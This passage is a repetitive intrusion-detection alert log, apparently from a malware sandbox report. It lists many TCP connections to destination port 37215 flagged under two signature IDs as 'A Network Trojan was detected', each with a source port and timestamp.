          SID:2835222
          Source Port:38664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288204
          SID:2829579
          Source Port:44174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692131
          SID:2835222
          Source Port:43810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080666
          SID:2835222
          Source Port:42074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478723
          SID:2835222
          Source Port:36024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300770
          SID:2835222
          Source Port:38298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472256
          SID:2835222
          Source Port:53666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119692
          SID:2835222
          Source Port:43190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227138
          SID:2829579
          Source Port:56442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294375
          SID:2829579
          Source Port:38866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.269137
          SID:2835222
          Source Port:44298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473689
          SID:2835222
          Source Port:50356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227664
          SID:2835222
          Source Port:47894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.949897
          SID:2829579
          Source Port:33548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162310
          SID:2835222
          Source Port:48318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.684777
          SID:2829579
          Source Port:37052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945678
          SID:2835222
          Source Port:55146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.889109
          SID:2829579
          Source Port:41164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.635982
          SID:2835222
          Source Port:36626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822369
          SID:2829579
          Source Port:44002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164678
          SID:2835222
          Source Port:50988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537789
          SID:2835222
          Source Port:42722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471349
          SID:2835222
          Source Port:41756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102116
          SID:2829579
          Source Port:40042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164947
          SID:2835222
          Source Port:58118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985165
          SID:2835222
          Source Port:53934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284029
          SID:2835222
          Source Port:55604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721639
          SID:2835222
          Source Port:48644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.083275
          SID:2829579
          Source Port:58020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.128107
          SID:2829579
          Source Port:40490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033527
          SID:2835222
          Source Port:49964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720822
          SID:2829579
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398181
          SID:2829579
          Source Port:39796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284998
          SID:2829579
          Source Port:42786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168612
          SID:2835222
          Source Port:58578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821226
          SID:2829579
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104534
          SID:2835222
          Source Port:43866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597358
          SID:2829579
          Source Port:37480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606671
          SID:2835222
          Source Port:48996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033033
          SID:2835222
          Source Port:55394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.954397
          SID:2835222
          Source Port:57168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166721
          SID:2835222
          Source Port:54236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035102
          SID:2829579
          Source Port:53362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867252
          SID:2829579
          Source Port:45782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.148183
          SID:2829579
          Source Port:55052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104750
          SID:2835222
          Source Port:52348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564279
          SID:2835222
          Source Port:50004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558080
          SID:2829579
          Source Port:49892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399760
          SID:2835222
          Source Port:41798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294755
          SID:2835222
          Source Port:34860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.941967
          SID:2829579
          Source Port:45952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930111
          SID:2835222
          Source Port:49382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164004
          SID:2829579
          Source Port:54832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925465
          SID:2829579
          Source Port:39406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297774
          SID:2829579
          Source Port:39118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823546
          SID:2835222
          Source Port:47240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598657
          SID:2829579
          Source Port:60386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476890
          SID:2829579
          Source Port:41382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161346
          SID:2835222
          Source Port:44224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039014
          SID:2835222
          Source Port:48752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.013008
          SID:2835222
          Source Port:43382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865268
          SID:2829579
          Source Port:41400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395976
          SID:2835222
          Source Port:34178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947440
          SID:2829579
          Source Port:37768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645137
          SID:2835222
          Source Port:46288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312684
          SID:2835222
          Source Port:41542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164661
          SID:2829579
          Source Port:34308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721509
          SID:2835222
          Source Port:51250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248691
          SID:2835222
          Source Port:35844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284748
          SID:2835222
          Source Port:43294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417431
          SID:2835222
          Source Port:50646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283294
          SID:2835222
          Source Port:41568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283846
          SID:2835222
          Source Port:43394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557142
          SID:2835222
          Source Port:55202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397181
          SID:2829579
          Source Port:44348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.696376
          SID:2829579
          Source Port:46648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398508
          SID:2835222
          Source Port:49630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644401
          SID:2835222
          Source Port:55620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914191
          SID:2835222
          Source Port:34830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945220
          SID:2829579
          Source Port:38626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.399089
          SID:2835222
          Source Port:57622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863335
          SID:2835222
          Source Port:47544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167947
          SID:2835222
          Source Port:46000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465612
          SID:2835222
          Source Port:49728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397519
          SID:2835222
          Source Port:45428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861150
          SID:2829579
          Source Port:57300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033791
          SID:2835222
          Source Port:40380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720462
          SID:2829579
          Source Port:44664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718931
          SID:2829579
          Source Port:36254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396543
          SID:2835222
          Source Port:42746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996321
          SID:2829579
          Source Port:48436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418785
          SID:2829579
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564828
          SID:2829579
          Source Port:45434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253067
          SID:2829579
          Source Port:48308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104446
          SID:2829579
          Source Port:57720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948573
          SID:2835222
          Source Port:48446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596909
          SID:2835222
          Source Port:58562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716646
          SID:2835222
          Source Port:37400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413012
          SID:2835222
          Source Port:56942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292303
          SID:2829579
          Source Port:41520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034515
          SID:2829579
          Source Port:58000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643886
          SID:2829579
          Source Port:54622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034336
          SID:2835222
          Source Port:50884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897157
          SID:2835222
          Source Port:38316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564316
          SID:2829579
          Source Port:41376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993189
          SID:2835222
          Source Port:43516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417629
          SID:2829579
          Source Port:59234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287141
          SID:2835222
          Source Port:49864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473509
          SID:2835222
          Source Port:39494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165654
          SID:2835222
          Source Port:59222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928683
          SID:2835222
          Source Port:50162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987841
          SID:2835222
          Source Port:45482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102158
          SID:2835222
          Source Port:37354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719856
          SID:2829579
          Source Port:47902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243863
          SID:2829579
          Source Port:35400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724289
          SID:2829579
          Source Port:47362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.270013
          SID:2835222
          Source Port:33622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.886943
          SID:2835222
          Source Port:44128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822712
          SID:2835222
          Source Port:45460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133936
          SID:2835222
          Source Port:59266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946276
          SID:2829579
          Source Port:47720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986392
          SID:2835222
          Source Port:57538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593719
          SID:2829579
          Source Port:39462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862000
          SID:2835222
          Source Port:36460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165268
          SID:2835222
          Source Port:35804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291594
          SID:2829579
          Source Port:56192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921077
          SID:2829579
          Source Port:40600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.018176
          SID:2829579
          Source Port:54194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539563
          SID:2829579
          Source Port:57180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471846
          SID:2829579
          Source Port:46564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996679
          SID:2829579
          Source Port:55412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868901
          SID:2835222
          Source Port:43682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694087
          SID:2835222
          Source Port:46122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645412
          SID:2829579
          Source Port:44778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031583
          SID:2835222
          Source Port:59294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915767
          SID:2835222
          Source Port:52066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166289
          SID:2835222
          Source Port:60898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928723
          SID:2829579
          Source Port:46650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081558
          SID:2829579
          Source Port:44444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950175
          SID:2835222
          Source Port:35560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396087
          SID:2835222
          Source Port:54120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165971
          SID:2829579
          Source Port:41494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540145
          SID:2835222
          Source Port:42512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357546
          SID:2835222
          Source Port:60926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288605
          SID:2835222
          Source Port:49128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224429
          SID:2829579
          Source Port:43704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223432
          SID:2835222
          Source Port:49694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929684
          SID:2829579
          Source Port:32894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713472
          SID:2829579
          Source Port:41450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865083
          SID:2835222
          Source Port:34458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028874
          SID:2829579
          Source Port:57774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300939
          SID:2835222
          Source Port:47828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.647625
          SID:2829579
          Source Port:46534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602736
          SID:2835222
          Source Port:56606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989637
          SID:2835222
          Source Port:36696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162461
          SID:2829579
          Source Port:51964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166886
          SID:2835222
          Source Port:52990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720507
          SID:2835222
          Source Port:42302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596848
          SID:2835222
          Source Port:58000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162565
          SID:2829579
          Source Port:45836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162830
          SID:2829579
          Source Port:45866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993573
          SID:2829579
          Source Port:50040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719698
          SID:2835222
          Source Port:47026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897799
          SID:2829579
          Source Port:60946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538062
          SID:2829579
          Source Port:37466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035173
          SID:2835222
          Source Port:40198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223270
          SID:2835222
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651580
          SID:2835222
          Source Port:56300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031377
          SID:2829579
          Source Port:39328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129076
          SID:2835222
          Source Port:56876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989671
          SID:2835222
          Source Port:43808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469244
          SID:2835222
          Source Port:40574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719882
          SID:2835222
          Source Port:54900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945702
          SID:2829579
          Source Port:53896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081673
          SID:2829579
          Source Port:58636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130842
          SID:2829579
          Source Port:59532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244280
          SID:2835222
          Source Port:38772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606050
          SID:2829579
          Source Port:33822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819762
          SID:2829579
          Source Port:58028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902334
          SID:2835222
          Source Port:58652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166274
          SID:2829579
          Source Port:46570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225048
          SID:2829579
          Source Port:45988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599178
          SID:2835222
          Source Port:53668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034791
          SID:2835222
          Source Port:38976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821629
          SID:2835222
          Source Port:55376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.896005
          SID:2829579
          Source Port:34248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132423
          SID:2835222
          Source Port:48640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400468
          SID:2829579
          Source Port:34166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286646
          SID:2835222
          Source Port:55668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538944
          SID:2829579
          Source Port:34910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286604
          SID:2835222
          Source Port:42088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206680
          SID:2835222
          Source Port:43626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917873
          SID:2835222
          Source Port:43020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677481
          SID:2829579
          Source Port:48974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223219
          SID:2835222
          Source Port:50612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415415
          SID:2835222
          Source Port:48002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008069
          SID:2835222
          Source Port:39566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597212
          SID:2835222
          Source Port:45736
          Destination Port:37215
